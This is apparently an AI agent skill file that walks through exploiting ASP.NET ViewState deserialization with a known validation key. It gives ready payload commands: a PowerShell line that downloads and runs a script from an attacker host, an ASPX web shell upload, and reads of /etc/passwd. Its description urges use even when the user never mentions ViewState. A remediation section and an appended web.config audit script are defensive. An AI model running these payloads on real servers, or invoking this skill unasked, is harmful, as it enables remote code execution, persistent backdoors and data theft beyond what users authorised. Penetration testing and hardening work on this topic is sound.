Hacktricks-skills aspnet-viewstate-exploit

How to exploit ASP.NET ViewState deserialization attacks when the secret key is known. Use this skill whenever you need to test ASP.NET applications for ViewState vulnerabilities, analyze ViewState tokens, perform deserialization attacks on .NET applications, or work with __VIEWSTATE parameters. Make sure to use this skill for any ASP.NET security testing involving ViewState, even if the user doesn't explicitly mention 'ViewState' or 'deserialization'.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret/SKILL.MD
source content

ASP.NET ViewState Deserialization Exploitation

This skill guides you through exploiting ASP.NET ViewState deserialization vulnerabilities when the validation secret key is known or can be obtained.

Background

ASP.NET ViewState is a mechanism for preserving page and control values between postbacks. When ViewStateMac is enabled but the validation key is compromised, attackers can forge ViewState data that passes MAC validation and is deserialized by the server, which lets them execute arbitrary code.

When to Use This Skill

  • You have access to an ASP.NET application's ViewState token
  • You know or can obtain the ViewState validation secret key
  • You need to test for deserialization vulnerabilities in .NET applications
  • You're analyzing __VIEWSTATE parameters in web requests
  • You need to generate malicious ViewState payloads

Prerequisites

  1. ViewState Token: Extract from the target page's HTML or HTTP requests
  2. Validation Secret Key: Must be known or obtained through other means
  3. Target Information: ASP.NET version, application configuration

Tools Required

ViewStateExploiter

A Python tool for ViewState manipulation:

pip install viewstate-exploiter

Alternative: Custom Scripts

See the scripts/ directory for helper scripts.

Exploitation Workflow

Step 1: Extract ViewState Information

Extract the __VIEWSTATE parameter from the target page:

# From HTML
# Look for: <input type="hidden" name="__VIEWSTATE" value="..." />

# From HTTP requests
# Use Burp Suite, browser dev tools, or curl

Step 2: Analyze ViewState Configuration

Determine the ViewState settings:

  • Is EnableViewStateMac enabled? (Required for this attack: with MAC validation on, a ViewState is accepted only if it is signed with the validation key)
  • What encryption algorithm is used? (AES, 3DES, etc.)
  • What is the validation key?

Step 3: Generate Malicious Payload

Use ViewStateExploiter to create a malicious ViewState:

# Basic command structure
python viewstate-exploiter.py \
  --command "your-command-here" \
  --secret "your-validation-key" \
  --viewstate "extracted-viewstate" \
  --output malicious_viewstate.txt

Step 4: Inject and Test

Replace the original __VIEWSTATE with your malicious version and submit the form.

Common Commands

Command Execution

# Windows
--command "cmd.exe /c whoami"

# Linux
--command "id"

File Operations

# Read file
--command "cat /etc/passwd"

# Write file
--command "echo 'test' > /tmp/payload.txt"

Payload Examples

Reverse Shell

# Generate reverse shell payload
python viewstate-exploiter.py \
  --command "powershell -c ""IEX(New-Object Net.WebClient).DownloadString('http://attacker/shell.ps1')""" \
  --secret "your-secret-key" \
  --viewstate "original-viewstate"

Web Shell Upload

# Upload ASPX web shell
python viewstate-exploiter.py \
  --command "echo '<%System.Diagnostics.Process.Start(Request[""cmd""])%>' > /path/to/shell.aspx" \
  --secret "your-secret-key" \
  --viewstate "original-viewstate"

Troubleshooting

ViewState Validation Failed

  • Verify the secret key is correct
  • Check if the key format matches (base64, hex, etc.)
  • Ensure ViewStateMac is enabled on the target

Payload Not Executing

  • Check ASP.NET version compatibility
  • Verify the command syntax for the target OS
  • Ensure the application pool identity has permissions

Encryption Algorithm Issues

  • Try different encryption algorithms (AES, 3DES)
  • Check if the target uses custom encryption

Security Considerations

  • Authorization: Only test systems you have permission to assess
  • Documentation: Document all findings and payloads used
  • Cleanup: Remove any files or changes made during testing
  • Reporting: Provide clear remediation guidance

Remediation Guidance

For Application Owners

  1. Never hardcode validation keys in source code or configuration files
  2. Use machineKey with strong, unique keys per application
  3. Keep ASP.NET updated to patch known vulnerabilities
  4. Implement proper access controls to prevent ViewState manipulation
  5. Consider disabling ViewState if not needed

Configuration Example

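<system.web>
  <!-- Keys are auto-generated and isolated per application; no key material is stored in this file -->
  <machineKey validationKey="AutoGenerate,IsolateApps" decryptionKey="AutoGenerate,IsolateApps" validation="HMACSHA256" decryption="AES" />
</system.web>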
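
One way to check a set of web.config files against the guidance above, as an added example that is not part of the original skill or the upstream repo. The function names, app names and sample configs are constructed for illustration, and the attribute defaults are assumed to be those of ASP.NET 4.x.

```python
import xml.etree.ElementTree as ET

WEAK_VALIDATION = {"MD5", "SHA1", "3DES"}  # legacy machineKey/@validation values
WEAK_DECRYPTION = {"DES", "3DES"}
FAKE_KEY = "0F" * 32  # constructed placeholder, not a real key

def _elements(root, name):
    # Compare local names so a config with a legacy xmlns is still matched.
    return [e for e in root.iter() if e.tag.rsplit("}", 1)[-1] == name]

def audit_machine_key(config_xml):
    """Return findings for one web.config; key material is never echoed."""
    root, findings = ET.fromstring(config_xml), []
    for pages in _elements(root, "pages"):
        if pages.get("enableViewStateMac", "true").lower() == "false":
            findings.append("enableViewStateMac=false")
    for mk in _elements(root, "machineKey"):
        for attr in ("validationKey", "decryptionKey"):
            value = mk.get(attr, "AutoGenerate,IsolateApps")  # assumed default
            if not value.startswith("AutoGenerate"):
                findings.append(f"static {attr} stored in config")
            elif "IsolateApps" not in value:
                findings.append(f"{attr} auto-generated without IsolateApps")
        if mk.get("validation", "HMACSHA256").upper() in WEAK_VALIDATION:
            findings.append("weak validation algorithm")
        if mk.get("decryption", "Auto").upper() in WEAK_DECRYPTION:
            findings.append("weak decryption algorithm")
    return findings

def shared_keys(configs):
    """List groups of app names whose configs reuse one static validationKey."""
    seen = {}
    for name, xml in configs.items():
        for mk in _elements(ET.fromstring(xml), "machineKey"):
            key = mk.get("validationKey", "")
            if key and not key.startswith("AutoGenerate"):
                seen.setdefault(key.upper(), []).append(name)
    return [sorted(apps) for apps in seen.values() if len(apps) > 1]

def _cfg(inner):
    return f"<configuration><system.web>{inner}</system.web></configuration>"

# Constructed sample configs (hypothetical app names).
SAMPLES = {
    "intranet": _cfg(f'<pages enableViewStateMac="false"/><machineKey validationKey="{FAKE_KEY}" '
                     f'decryptionKey="{FAKE_KEY}" validation="SHA1" decryption="3DES"/>'),
    "portal": _cfg(f'<machineKey validationKey="{FAKE_KEY}" validation="HMACSHA256" decryption="AES"/>'),
    "hardened": _cfg('<machineKey validationKey="AutoGenerate,IsolateApps" validation="HMACSHA256"/>'),
}

if __name__ == "__main__":
    for app, xml in SAMPLES.items():
        print(app, audit_machine_key(xml))
    print("shared static keys:", shared_keys(SAMPLES))
```

The findings name the attribute but never print the key itself, so the audit output can be shared without leaking the secret it is looking for.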

Related Skills

  • ASP.NET deserialization attacks
  • .NET binary exploitation
  • Web application security testing
  • Burp Suite extensions for ViewState